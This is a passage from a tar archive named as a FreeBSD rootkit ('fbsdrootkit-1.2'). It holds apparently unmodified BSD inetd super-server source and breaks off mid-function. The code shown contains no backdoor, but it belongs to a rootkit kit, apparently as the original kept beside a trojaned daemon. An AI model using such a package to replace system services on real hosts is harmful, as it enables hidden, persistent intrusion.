LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)pathnames.h 8.1 (Berkeley) 6/6/93 */ #include #define _PATH_INETDCONF "/etc/inetd.conf" #define _PATH_INETDPID _PATH_VARRUN "inetd.pid" fbsdrootkit-1.2/inetd/inetd.c.dist100600 764 764 106002 6254701651 14514 0ustar dfdf/* * Copyright (c) 1983, 1991, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1983, 1991, 1993, 1994\n\ The Regents of the University of California. All rights reserved.\n"; #endif /* not lint */ #ifndef lint /* from: @(#)inetd.c 8.4 (Berkeley) 4/13/94"; */ static char inetd_c_rcsid[] = "$Id: inetd.c,v 1.6.2.1 1996/05/07 03:11:58 gpalmer Exp $"; #endif /* not lint */ /* * Inetd - Internet super-server * * This program invokes all internet services as needed. Connection-oriented * services are invoked each time a connection is made, by creating a process. * This process is passed the connection as file descriptor 0 and is expected * to do a getpeername to find out the source host and port. * * Datagram oriented services are invoked when a datagram * arrives; a process is created and passed a pending message * on file descriptor 0. Datagram servers may either connect * to their peer, freeing up the original socket for inetd * to receive further messages on, or ``take over the socket'', * processing all arriving datagrams and, eventually, timing * out. The first type of server is said to be ``multi-threaded''; * the second type of server ``single-threaded''. * * Inetd uses a configuration file which is read at startup * and, possibly, at some later time in response to a hangup signal. * The configuration file is ``free format'' with fields given in the * order shown below. Continuation lines for an entry must being with * a space or tab. All fields must be present in each entry. * * service name must be in /etc/services or must * name a tcpmux service * socket type stream/dgram/raw/rdm/seqpacket * protocol must be in /etc/protocols * wait/nowait single-threaded/multi-threaded * user user to run daemon as * server program full path name * server program arguments maximum of MAXARGS (20) * * TCP services without official port numbers are handled with the * RFC1078-based tcpmux internal service. Tcpmux listens on port 1 for * requests. When a connection is made from a foreign host, the service * requested is passed to tcpmux, which looks it up in the servtab list * and returns the proper entry for the service. Tcpmux returns a * negative reply if the service doesn't exist, otherwise the invoked * server is expected to return the positive reply if the service type in * inetd.conf file has the prefix "tcpmux/". If the service type has the * prefix "tcpmux/+", tcpmux will return the positive reply for the * process; this is for compatibility with older server code, and also * allows you to invoke programs that use stdin/stdout without putting any * special server code in them. Services that use tcpmux are "nowait" * because they do not have a well-known port and hence cannot listen * for new requests. * * For RPC services * service name/version must be in /etc/rpc * socket type stream/dgram/raw/rdm/seqpacket * protocol must be in /etc/protocols * wait/nowait single-threaded/multi-threaded * user user to run daemon as * server program full path name * server program arguments maximum of MAXARGS * * Comment lines are indicated by a `#' in column 1. */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pathnames.h" #define TOOMANY 256 /* don't start more than TOOMANY */ #define CNT_INTVL 60 /* servers in CNT_INTVL sec. */ #define RETRYTIME (60*10) /* retry after bind or server fail */ #define SIGBLOCK (sigmask(SIGCHLD)|sigmask(SIGHUP)|sigmask(SIGALRM)) int debug = 0; int log = 0; int nsock, maxsock; fd_set allsock; int options; int timingout; int toomany = TOOMANY; struct servent *sp; struct rpcent *rpc; struct servtab { char *se_service; /* name of service */ int se_socktype; /* type of socket to use */ char *se_proto; /* protocol used */ short se_wait; /* single threaded server */ short se_checked; /* looked at during merge */ char *se_user; /* user name to run as */ struct biltin *se_bi; /* if built-in, description */ char *se_server; /* server program */ #define MAXARGV 20 char *se_argv[MAXARGV+1]; /* program arguments */ int se_fd; /* open descriptor */ int se_type; /* type */ struct sockaddr_in se_ctrladdr;/* bound address */ int se_rpc; /* ==1 if RPC service */ int se_rpc_prog; /* RPC program number */ u_int se_rpc_lowvers; /* RPC low version */ u_int se_rpc_highvers; /* RPC high version */ int se_count; /* number started since se_time */ struct timeval se_time; /* start of se_count */ struct servtab *se_next; } *servtab; #define NORM_TYPE 0 #define MUX_TYPE 1 #define MUXPLUS_TYPE 2 #define ISMUX(sep) (((sep)->se_type == MUX_TYPE) || \ ((sep)->se_type == MUXPLUS_TYPE)) #define ISMUXPLUS(sep) ((sep)->se_type == MUXPLUS_TYPE) void chargen_dg __P((int, struct servtab *)); void chargen_stream __P((int, struct servtab *)); void close_sep __P((struct servtab *)); void config __P((int)); void daytime_dg __P((int, struct servtab *)); void daytime_stream __P((int, struct servtab *)); void discard_dg __P((int, struct servtab *)); void discard_stream __P((int, struct servtab *)); void echo_dg __P((int, struct servtab *)); void echo_stream __P((int, struct servtab *)); void endconfig __P((void)); struct servtab *enter __P((struct servtab *)); void freeconfig __P((struct servtab *)); struct servtab *getconfigent __P((void)); void machtime_dg __P((int, struct servtab *)); void machtime_stream __P((int, struct servtab *)); char *newstr __P((char *)); char *nextline __P((FILE *)); void print_service __P((char *, struct servtab *)); void reapchild __P((int)); void retry __P((int)); int setconfig __P((void)); void setup __P((struct servtab *)); char *sskip __P((char **)); char *skip __P((char **)); struct servtab *tcpmux __P((int)); void unregisterrpc __P((register struct servtab *sep)); struct biltin { char *bi_service; /* internally provided service name */ int bi_socktype; /* type of socket supported */ short bi_fork; /* 1 if should fork before call */ short bi_wait; /* 1 if should wait for child */ void (*bi_fn)(); /* function which performs it */ } biltins[] = { /* Echo received data */ { "echo", SOCK_STREAM, 1, 0, echo_stream }, { "echo", SOCK_DGRAM, 0, 0, echo_dg }, /* Internet /dev/null */ { "discard", SOCK_STREAM, 1, 0, discard_stream }, { "discard", SOCK_DGRAM, 0, 0, discard_dg }, /* Return 32 bit time since 1970 */ { "time", SOCK_STREAM, 0, 0, machtime_stream }, { "time", SOCK_DGRAM, 0, 0, machtime_dg }, /* Return human-readable time */ { "daytime", SOCK_STREAM, 0, 0, daytime_stream }, { "daytime", SOCK_DGRAM, 0, 0, daytime_dg }, /* Familiar character generator */ { "chargen", SOCK_STREAM, 1, 0, chargen_stream }, { "chargen", SOCK_DGRAM, 0, 0, chargen_dg }, { "tcpmux", SOCK_STREAM, 1, 0, (void (*)())tcpmux }, { NULL } }; #define NUMINT (sizeof(intab) / sizeof(struct inent)) char *CONFIG = _PATH_INETDCONF; char **Argv; char *LastArg; int main(argc, argv, envp) int argc; char *argv[], *envp[]; { struct servtab *sep; struct passwd *pwd; struct sigvec sv; int tmpint, ch, dofork; pid_t pid; char buf[50]; struct sockaddr_in peer; int i; Argv = argv; if (envp == 0 || *envp == 0) envp = argv; while (*envp) envp++; LastArg = envp[-1] + strlen(envp[-1]); openlog("inetd", LOG_PID | LOG_NOWAIT, LOG_DAEMON); while ((ch = getopt(argc, argv, "dlR:")) != EOF) switch(ch) { case 'd': debug = 1; options |= SO_DEBUG; break; case 'l': log = 1; break; case 'R': { /* invocation rate */ char *p; tmpint = strtol(optarg, &p, 0); if (tmpint < 1 || *p) syslog(LOG_ERR, "-R %s: bad value for service invocation rate", optarg); else toomany = tmpint; break; } case '?': default: syslog(LOG_ERR, "usage: inetd [-dl] [-R rate] [conf-file]"); exit(1); } argc -= optind; argv += optind; if (argc > 0) CONFIG = argv[0]; if (debug == 0) { FILE *fp; daemon(0, 0); pid = getpid(); fp = fopen(_PATH_INETDPID, "w"); if (fp) { fprintf(fp, "%ld\n", (long)pid); fclose(fp); } else { syslog(LOG_WARNING, _PATH_INETDPID ": %m"); } } memset(&sv, 0, sizeof(sv)); sv.sv_mask = SIGBLOCK; sv.sv_handler = retry; sigvec(SIGALRM, &sv, (struct sigvec *)0); config(SIGHUP); sv.sv_handler = config; sigvec(SIGHUP, &sv, (struct sigvec *)0); sv.sv_handler = reapchild; sigvec(SIGCHLD, &sv, (struct sigvec *)0); { /* space for daemons to overwrite environment for ps */ #define DUMMYSIZE 100 char dummy[DUMMYSIZE]; (void)memset(dummy, 'x', sizeof(DUMMYSIZE) - 1); dummy[DUMMYSIZE - 1] = '\0'; (void)setenv("inetd_dummy", dummy, 1); } for (;;) { int n, ctrl; fd_set readable; if (nsock == 0) { (void) sigblock(SIGBLOCK); while (nsock == 0) sigpause(0L); (void) sigsetmask(0L); } readable = allsock; if ((n = select(maxsock + 1, &readable, (fd_set *)0, (fd_set *)0, (struct timeval *)0)) <= 0) { if (n < 0 && errno != EINTR) syslog(LOG_WARNING, "select: %m"); sleep(1); continue; } for (sep = servtab; n && sep; sep = sep->se_next) if (sep->se_fd != -1 && FD_ISSET(sep->se_fd, &readable)) { n--; if (debug) fprintf(stderr, "someone wants %s\n", sep->se_service); if (!sep->se_wait && sep->se_socktype == SOCK_STREAM) { ctrl = accept(sep->se_fd, (struct sockaddr *)0, (int *)0); if (debug) fprintf(stderr, "accept, ctrl %d\n", ctrl); if (ctrl < 0) { if (errno != EINTR) syslog(LOG_WARNING, "accept (for %s): %m", sep->se_service); continue; } if(log) { i = sizeof peer; if(getpeername(ctrl, (struct sockaddr *) &peer, &i)) { syslog(LOG_WARNING, "getpeername(for %s): %m", sep->se_service); continue; } syslog(LOG_INFO,"%s from %s", sep->se_service, inet_ntoa(peer.sin_addr)); } /* * Call tcpmux to find the real service to exec. */ if (sep->se_bi && sep->se_bi->bi_fn == (void (*)()) tcpmux) { struct servtab *tsep; tsep = tcpmux(ctrl); if (tsep == NULL) { close(ctrl); continue; } sep = tsep; } } else ctrl = sep->se_fd; (void) sigblock(SIGBLOCK); pid = 0; dofork = (sep->se_bi == 0 || sep->se_bi->bi_fork); if (dofork) { if (sep->se_count++ == 0) (void)gettimeofday(&sep->se_time, (struct timezone *)0); else if (sep->se_count >= toomany) { struct timeval now; (void)gettimeofday(&now, (struct timezone *)0); if (now.tv_sec - sep->se_time.tv_sec > CNT_INTVL) { sep->se_time = now; sep->se_count = 1; } else { syslog(LOG_ERR, "%s/%s server failing (looping), service terminated", sep->se_service, sep->se_proto); close_sep(sep); sigsetmask(0L); if (!timingout) { timingout = 1; alarm(RETRYTIME); } continue; } } pid = fork(); } if (pid < 0) { syslog(LOG_ERR, "fork: %m"); if (!sep->se_wait && sep->se_socktype == SOCK_STREAM) close(ctrl); sigsetmask(0L); sleep(1); continue; } if (pid && sep->se_wait) { sep->se_wait = pid; if (sep->se_fd >= 0) { FD_CLR(sep->se_fd, &allsock); nsock--; } } sigsetmask(0L); if (pid == 0) { if (debug && dofork) setsid(); if (dofork) { if (debug) fprintf(stderr, "+ Closing from %d\n", maxsock); for (tmpint = maxsock; tmpint > 2; tmpint--) if (tmpint != ctrl) close(tmpint); } if (sep->se_bi) (*sep->se_bi->bi_fn)(ctrl, sep); else { if (debug) fprintf(stderr, "%d execl %s\n", getpid(), sep->se_server); dup2(ctrl, 0); close(ctrl); dup2(0, 1); dup2(0, 2); if ((pwd = getpwnam(sep->se_user)) == NULL) { syslog(LOG_ERR, "%s/%s: %s: No such user", sep->se_service, sep->se_proto, sep->se_user); if (sep->se_socktype != SOCK_STREAM) recv(0, buf, sizeof (buf), 0); _exit(1); } if (pwd->pw_uid) { if (setgid(pwd->pw_gid) < 0) { syslog(LOG_ERR, "%s: can't set gid %d: %m", sep->se_service, pwd->pw_gid); _exit(1); } (void) initgroups(pwd->pw_name, pwd->pw_gid); if (setuid(pwd->pw_uid) < 0) { syslog(LOG_ERR, "%s: can't set uid %d: %m", sep->se_service, pwd->pw_uid); _exit(1); } } execv(sep->se_server, sep->se_argv); if (sep->se_socktype != SOCK_STREAM) recv(0, buf, sizeof (buf), 0); syslog(LOG_ERR, "cannot execute %s: %m", sep->se_server); _exit(1); } } if (!sep->se_wait && sep->se_socktype == SOCK_STREAM) close(ctrl); } } } void reapchild(signo) int signo; { int status; pid_t pid; struct servtab *sep; for (;;) { pid = wait3(&status, WNOHANG, (struct rusage *)0); if (pid <= 0) break; if (debug) fprintf(stderr, "%d reaped, status %#x\n", pid, status); for (sep = servtab; sep; sep = sep->se_next) if (sep->se_wait == pid) { if (status) syslog(LOG_WARNING, "%s: exit status 0x%x", sep->se_server, status); if (debug) fprintf(stderr, "restored %s, fd %d\n", sep->se_service, sep->se_fd); FD_SET(sep->se_fd, &allsock); nsock++; sep->se_wait = 1; } } } void config(signo) int signo; { struct servtab *sep, *cp, **sepp; struct passwd *pwd; long omask; if (!setconfig()) { syslog(LOG_ERR, "%s: %m", CONFIG); return; } for (sep = servtab; sep; sep = sep->se_next) sep->se_checked = 0; while (cp = getconfigent()) { if ((pwd = getpwnam(cp->se_user)) == NULL) { syslog(LOG_ERR, "%s/%s: No such user '%s', service ignored", cp->se_service, cp->se_proto, cp->se_user); continue; } for (sep = servtab; sep; sep = sep->se_next) if (strcmp(sep->se_service, cp->se_service) == 0 && strcmp(sep->se_proto, cp->se_proto) == 0) break; if (sep != 0) { int i; omask = sigblock(SIGBLOCK); /* * sep->se_wait may be holding the pid of a daemon * that we're waiting for. If so, don't overwrite * it unless the config file explicitly says don't * wait. */ if (cp->se_bi == 0 && (sep->se_wait == 1 || cp->se_wait == 0)) sep->se_wait = cp->se_wait; #define SWAP(a, b) { char *c = a; a = b; b = c; } if (cp->se_user) SWAP(sep->se_user, cp->se_user); if (cp->se_server) SWAP(sep->se_server, cp->se_server); for (i = 0; i < MAXARGV; i++) SWAP(sep->se_argv[i], cp->se_argv[i]); sigsetmask(omask); freeconfig(cp); if (debug) print_service("REDO", sep); } else { sep = enter(cp); if (debug) print_service("ADD ", sep); } sep->se_checked = 1; if (ISMUX(sep)) { sep->se_fd = -1; continue; } if (!sep->se_rpc) { sp = getservbyname(sep->se_service, sep->se_proto); if (sp == 0) { syslog(LOG_ERR, "%s/%s: unknown service", sep->se_service, sep->se_proto); sep->se_checked = 0; continue; } if (sp->s_port != sep->se_ctrladdr.sin_port) { sep->se_ctrladdr.sin_family = AF_INET; sep->se_ctrladdr.sin_port = sp->s_port; if (sep->se_fd >= 0) close_sep(sep); } } else { rpc = getrpcbyname(sep->se_service); if (rpc == 0) { syslog(LOG_ERR, "%s/%s unknown RPC service.", sep->se_service, sep->se_proto); if (sep->se_fd != -1) (void) close(sep->se_fd); sep->se_fd = -1; continue; } if (rpc->r_number != sep->se_rpc_prog) { if (sep->se_rpc_prog) unregisterrpc(sep); sep->se_rpc_prog = rpc->r_number; if (sep->se_fd != -1) (void) close(sep->se_fd); sep->se_fd = -1; } } if (sep->se_fd == -1) setup(sep); } endconfig(); /* * Purge anything not looked at above. */ omask = sigblock(SIGBLOCK); sepp = &servtab; while (sep = *sepp) { if (sep->se_checked) { sepp = &sep->se_next; continue; } *sepp = sep->se_next; if (sep->se_fd >= 0) close_sep(sep); if (debug) print_service("FREE", sep); if (sep->se_rpc && sep->se_rpc_prog > 0) unregisterrpc(sep); freeconfig(sep); free((char *)sep); } (void) sigsetmask(omask); } void unregisterrpc(sep) struct servtab *sep; { int i; struct servtab *sepp; long omask; omask = sigblock(SIGBLOCK); for (sepp = servtab; sepp; sepp = sepp->se_next) { if (sepp == sep) continue; if (sep->se_checked == 0 || !sepp->se_rpc || sep->se_rpc_prog != sepp->se_rpc_prog) continue; return; } if (debug) print_service("UNREG", sep); for (i = sep->se_rpc_lowvers; i <= sep->se_rpc_highvers; i++) pmap_unset(sep->se_rpc_prog, i); if (sep->se_fd != -1) (void) close(sep->se_fd); sep->se_fd = -1; (void) sigsetmask(omask); } void retry(signo) int signo; { struct servtab *sep; timingout = 0; for (sep = servtab; sep; sep = sep->se_next) if (sep->se_fd == -1) setup(sep); } void setup(sep) struct servtab *sep; { int on = 1; if ((sep->se_fd = socket(AF_INET, sep->se_socktype, 0)) < 0) { if (debug) fprintf(stderr, "socket failed on %s/%s: %s\n", sep->se_service, sep->se_proto, strerror(errno)); syslog(LOG_ERR, "%s/%s: socket: %m", sep->se_service, sep->se_proto); return; } #define turnon(fd, opt) \ setsockopt(fd, SOL_SOCKET, opt, (char *)&on, sizeof (on)) if (strcmp(sep->se_proto, "tcp") == 0 && (options & SO_DEBUG) && turnon(sep->se_fd, SO_DEBUG) < 0) syslog(LOG_ERR, "setsockopt (SO_DEBUG): %m"); if (turnon(sep->se_fd, SO_REUSEADDR) < 0) syslog(LOG_ERR, "setsockopt (SO_REUSEADDR): %m"); #undef turnon if (bind(sep->se_fd, (struct sockaddr *)&sep->se_ctrladdr, sizeof (sep->se_ctrladdr)) < 0) { if (debug) fprintf(stderr, "bind failed on %s/%s: %s\n", sep->se_service, sep->se_proto, strerror(errno)); syslog(LOG_ERR, "%s/%s: bind: %m", sep->se_service, sep->se_proto); (void) close(sep->se_fd); sep->se_fd = -1; if (!timingout) { timingout = 1; alarm(RETRYTIME); } return; } if (sep->se_rpc) { int i, len = sizeof(struct sockaddr); if (getsockname(sep->se_fd, (struct sockaddr*)&sep->se_ctrladdr, &len) < 0){ syslog(LOG_ERR, "%s/%s: getsockname: %m", sep->se_service, sep->se_proto); (void) close(sep->se_fd); sep->se_fd = -1; return; } if (debug) print_service("REG ", sep); for (i = sep->se_rpc_lowvers; i <= sep->se_rpc_highvers; i++) { pmap_unset(sep->se_rpc_prog, i); pmap_set(sep->se_rpc_prog, i, (sep->se_socktype == SOCK_DGRAM) ? IPPROTO_UDP : IPPROTO_TCP, ntohs(sep->se_ctrladdr.sin_port)); } } if (sep->se_socktype == SOCK_STREAM) listen(sep->se_fd, 10); FD_SET(sep->se_fd, &allsock); nsock++; if (sep->se_fd > maxsock) maxsock = sep->se_fd; if (debug) { fprintf(stderr, "registered %s on %d\n", sep->se_server, sep->se_fd); } } /* * Finish with a service and its socket. */ void close_sep(sep) struct servtab *sep; { if (sep->se_fd >= 0) { nsock--; FD_CLR(sep->se_fd, &allsock); (void) close(sep->se_fd); sep->se_fd = -1; } sep->se_count = 0; /* * Don't keep the pid of this running deamon: when reapchild() * reaps this pid, it would erroneously increment nsock. */ if (sep->se_wait > 1) sep->se_wait = 1; } struct servtab * enter(cp) struct servtab *cp; { struct servtab *sep; long omask; sep = (struct servtab *)malloc(sizeof (*sep)); if (sep == (struct servtab *)0) { syslog(LOG_ERR, "Out of memory."); exit(-1); } *sep = *cp; sep->se_fd = -1; omask = sigblock(SIGBLOCK); sep->se_next = servtab; servtab = sep; sigsetmask(omask); return (sep); } FILE *fconfig = NULL; struct servtab serv; char line[LINE_MAX]; int setconfig() { if (fconfig != NULL) { fseek(fconfig, 0L, SEEK_SET); return (1); } fconfig = fopen(CONFIG, "r"); return (fconfig != NULL); } void endconfig() { if (fconfig) { (void) fclose(fconfig); fconfig = NULL; } } struct servtab * getconfigent() { struct servtab *sep = &serv; int argc; char *cp, *arg; char *versp; static char TCPMUX_TOKEN[] = "tcpmux/"; #define MUX_LEN (sizeof(TCPMUX_TOKEN)-1) more: while ((cp = nextline(fconfig)) && (*cp == '#' || *cp == '\0')) ; if (cp == NULL) return ((struct servtab *)0); /* * clear the static buffer, since some fields (se_ctrladdr, * for example) don't get initialized here. */ memset((caddr_t)sep, 0, sizeof *sep); arg = skip(&cp); if (cp == NULL) { /* got an empty line containing just blanks/tabs. */ goto more; } if (strncmp(arg, TCPMUX_TOKEN, MUX_LEN) == 0) { char *c = arg + MUX_LEN; if (*c == '+') { sep->se_type = MUXPLUS_TYPE; c++; } else sep->se_type = MUX_TYPE; sep->se_service = newstr(c); } else { sep->se_service = newstr(arg); sep->se_type = NORM_TYPE; } arg = sskip(&cp); if (strcmp(arg, "stream") == 0) sep->se_socktype = SOCK_STREAM; else if (strcmp(arg, "dgram") == 0) sep->se_socktype = SOCK_DGRAM; else if (strcmp(arg, "rdm") == 0) sep->se_socktype = SOCK_RDM; else if (strcmp(arg, "seqpacket") == 0) sep->se_socktype = SOCK_SEQPACKET; else if (strcmp(arg, "raw") == 0) sep->se_socktype = SOCK_RAW; else sep->se_socktype = -1; sep->se_proto = newstr(sskip(&cp)); if (strncmp(sep->se_proto, "rpc/", 4) == 0) { sep->se_proto += 4; sep->se_rpc = 1; sep->se_rpc_prog = sep->se_rpc_lowvers = sep->se_rpc_lowvers = 0; sep->se_ctrladdr.sin_family = AF_INET; sep->se_ctrladdr.sin_port = 0; sep->se_ctrladdr.sin_addr.s_addr = htonl(INADDR_ANY); if ((versp = rindex(sep->se_service, '/'))) { *versp++ = '\0'; switch (sscanf(versp, "%d-%d", &sep->se_rpc_lowvers, &sep->se_rpc_highvers)) { case 2: break; case 1: sep->se_rpc_highvers = sep->se_rpc_lowvers; break; default: syslog(LOG_ERR, "bad RPC version specifier; %s\n", sep->se_service); freeconfig(sep); goto more; } } else { sep->se_rpc_lowvers = sep->se_rpc_highvers = 1; } } arg = sskip(&cp); sep->se_wait = strcmp(arg, "wait") == 0; if (ISMUX(sep)) { /* * Silently enforce "nowait" for TCPMUX services since * they don't have an assigned port to listen on. */ sep->se_wait = 0; if (strcmp(sep->se_proto, "tcp")) { syslog(LOG_ERR, "%s: bad protocol for tcpmux service %s", CONFIG, sep->se_service); goto more; } if (sep->se_socktype != SOCK_STREAM) { syslog(LOG_ERR, "%s: bad socket type for tcpmux service %s", CONFIG, sep->se_service); goto more; } } sep->se_user = newstr(sskip(&cp)); sep->se_server = newstr(sskip(&cp)); if (strcmp(sep->se_server, "internal") == 0) { struct biltin *bi; for (bi = biltins; bi->bi_service; bi++) if (bi->bi_socktype == sep->se_socktype && strcmp(bi->bi_service, sep->se_service) == 0) break; if (bi->bi_service == 0) { syslog(LOG_ERR, "internal service %s unknown", sep->se_service); goto more; } sep->se_bi = bi; sep->se_wait = bi->bi_wait; } else sep->se_bi = NULL; argc = 0; for (arg = skip(&cp); cp; arg = skip(&cp)) if (argc < MAXARGV) sep->se_argv[argc++] = newstr(arg); while (argc <= MAXARGV) sep->se_argv[argc++] = NULL; return (sep); } void freeconfig(cp) struct servtab *cp; { int i; if (cp->se_service) free(cp->se_service); if (cp->se_proto) free(cp->se_proto); if (cp->se_user) free(cp->se_user); if (cp->se_server) free(cp->se_server); for (i = 0; i < MAXARGV; i++) if (cp->se_argv[i]) free(cp->se_argv[i]); } /* * Safe skip - if skip returns null, log a syntax error in the * configuration file and exit. */ char * sskip(cpp) char **cpp; { char *cp; cp = skip(cpp); if (cp == NULL) { syslog(LOG_ERR, "%s: syntax error", CONFIG); exit(-1); } return (cp); } char * skip(cpp) char **cpp; { char *cp = *cpp; char *start; again: while (*cp == ' ' || *cp == '\t') cp++; if (*cp == '\0') { int c; c = getc(fconfig); (void) ungetc(c, fconfig); if (c == ' ' || c == '\t') if (cp = nextline(fconfig)) goto again; *cpp = (char *)0; return ((char *)0); } start = cp; while (*cp && *cp != ' ' && *cp != '\t') cp++; if (*cp != '\0') *cp++ = '\0'; *cpp = cp; return (start); } char * nextline(fd) FILE *fd; { char *cp; if (fgets(line, sizeof (line), fd) == NULL) return ((char *)0); cp = strchr(line, '\n'); if (cp) *cp = '\0'; return (line); } char * newstr(cp) char *cp; { if (cp = strdup(cp ? cp : "")) return (cp); syslog(LOG_ERR, "strdup: %m"); exit(-1); } void setproctitle(a, s) char *a; int s; { int size; char *cp; struct sockaddr_in sin; char buf[80]; cp = Argv[0]; size = sizeof(sin); if (getpeername(s, (struct sockaddr *)&sin, &size) == 0) (void) sprintf(buf, "-%s [%s]", a, inet_ntoa(sin.sin_addr)); else (void) sprintf(buf, "-%s", a); strncpy(cp, buf, LastArg - cp); cp += strlen(cp); while (cp < LastArg) *cp++ = ' '; } /* * Internet services provided internally by inetd: */ #define BUFSIZE 8192 /* ARGSUSED */ void echo_stream(s, sep) /* Echo service -- echo data back */ int s; struct servtab *sep; { char buffer[BUFSIZE]; int i; setproctitle(sep->se_service, s); while ((i = read(s, buffer, sizeof(buffer))) > 0 && write(s, buffer, i) > 0) ; exit(0); } int check_loop(sin, sep) struct sockaddr_in *sin; struct servtab *sep; { struct servtab *se2; for (se2 = servtab; se2; se2 = se2->se_next) { if (!se2->se_bi || se2->se_socktype != SOCK_DGRAM) continue; if (sin->sin_port == se2->se_ctrladdr.sin_port) { syslog(LOG_WARNING, "%s/%s:%s/%s loop request REFUSED from %s", sep->se_service, sep->se_proto, se2->se_service, se2->se_proto, inet_ntoa(sin->sin_addr)); return 1; } } return 0; } /* ARGSUSED */ void echo_dg(s, sep) /* Echo service -- echo data back */ int s; struct servtab *sep; { char buffer[BUFSIZE]; int i, size; struct sockaddr_in sin; size = sizeof(sin); if ((i = recvfrom(s, buffer, sizeof(buffer), 0, (struct sockaddr *)&sin, &size)) < 0) return; if (check_loop(&sin, sep)) return; (void) sendto(s, buffer, i, 0, (struct sockaddr *)&sin, sizeof(sin)); } /* ARGSUSED */ void discard_stream(s, sep) /* Discard service -- ignore data */ int s; struct servtab *sep; { int ret; char buffer[BUFSIZE]; setproctitle(sep->se_service, s); while (1) { while ((ret = read(s, buffer, sizeof(buffer))) > 0) ; if (ret == 0 || errno != EINTR) break; } exit(0); } /* ARGSUSED */ void discard_dg(s, sep) /* Discard service -- ignore data */ int s; struct servtab *sep; { char buffer[BUFSIZE]; (void) read(s, buffer, sizeof(buffer)); } #include #define LINESIZ 72 char ring[128]; char *endring; void initring() { int i; endring = ring; for (i = 0; i <= 128; ++i) if (isprint(i)) *endring++ = i; } /* ARGSUSED */ void chargen_stream(s, sep) /* Character generator */ int s; struct servtab *sep; { int len; char *rs, text[LINESIZ+2]; setproctitle(sep->se_service, s); if (!endring) { initring(); rs = ring; } text[LINESIZ] = '\r'; text[LINESIZ + 1] = '\n'; for (rs = ring;;) { if ((len = endring - rs) >= LINESIZ) memmove(text, rs, LINESIZ); else { memmove(text, rs, len); memmove(text + len, ring, LINESIZ - len); } if (++rs == endring) rs = ring; if (write(s, text, sizeof(text)) != sizeof(text)) break; } exit(0); } /* ARGSUSED */ void chargen_dg(s, sep) /* Character generator */ int s; struct servtab *sep; { struct sockaddr_in sin; static char *rs; int len, size; char text[LINESIZ+2]; if (endring == 0) { initring(); rs = ring; } size = sizeof(sin); if (recvfrom(s, text, sizeof(text), 0, (struct sockaddr *)&sin, &size) < 0) return; if (check_loop(&sin, sep)) return; if ((len = endring - rs) >= LINESIZ) memmove(text, rs, LINESIZ); else { memmove(text, rs, len); memmove(text + len, ring, LINESIZ - len); } if (++rs == endring) rs = ring; text[LINESIZ] = '\r'; text[LINESIZ + 1] = '\n'; (void) sendto(s, text, sizeof(text), 0, (struct sockaddr *)&sin, sizeof(sin)); } /* * Return a machine readable date and time, in the form of the * number of seconds since midnight, Jan 1, 1900. Since gettimeofday * returns the number of seconds since midnight, Jan 1, 1970, * we must add 2208988800 seconds to this figure to make up for * some seventy years Bell Labs was asleep. */ long machtime() { struct timeval tv; if (gettimeofday(&tv, (struct timezone *)0) < 0) { if (debug) fprintf(stderr, "Unable to get time of day\n"); return (0L); } #define OFFSET ((u_long)25567 * 24*60*60) return (htonl((long)(tv.tv_sec + OFFSET))); #undef OFFSET } /* ARGSUSED */ void machtime_stream(s, sep) int s; struct servtab *sep; { long result; result = machtime(); (void) write(s, (char *) &result, sizeof(result)); } /* ARGSUSED */ void machtime_dg(s, sep) int s; struct servtab *sep; { long result; struct sockaddr_in sin; int size; size = sizeof(sin); if (recvfrom(s, (char *)&result, sizeof(result), 0, (struct sockaddr *)&sin, &size) < 0) return; if (check_loop(&sin, sep)) return; result = machtime(); (void) sendto(s, (char *) &result, sizeof(result), 0, (struct sockaddr *)&sin, sizeof(sin)); } /* ARGSUSED */ void daytime_stream(s, sep) /* Return human-readable time of day */ int s; struct servtab *sep; { char buffer[256]; time_t clock; clock = time((time_t *) 0); (void) sprintf(buffer, "%.24s\r\n", ctime(&clock)); (void) write(s, buffer, strlen(buffer)); } /* ARGSUSED */ void daytime_dg(s, sep) /* Return human-readable time of day */ int s; struct servtab *sep; { char buffer[256]; time_t clock; struct sockaddr_in sin; int size; clock = time((time_t *) 0); size = sizeof(sin); if (recvfrom(s, buffer, sizeof(buffer), 0, (struct sockaddr *)&sin, &size) < 0) return; if (check_loop(&sin, sep)) return; (void) sprintf(buffer, "%.24s\r\n", ctime(&clock)); (void) sendto(s, buffer, strlen(buffer), 0, (struct sockaddr *)&sin, sizeof(sin)); } /* * print_service: * Dump relevant information to stderr */ void print_service(action, sep) char *action; struct servtab *sep; { if(sep->se_rpc) fprintf(stderr, "%s: %s proto=%s, wait=%d, user=%s builtin=%x server=%s\n", action, sep->se_service, sep->se_proto, sep->se_wait, sep->se_user, (int)sep->se_bi, sep->se_server); else 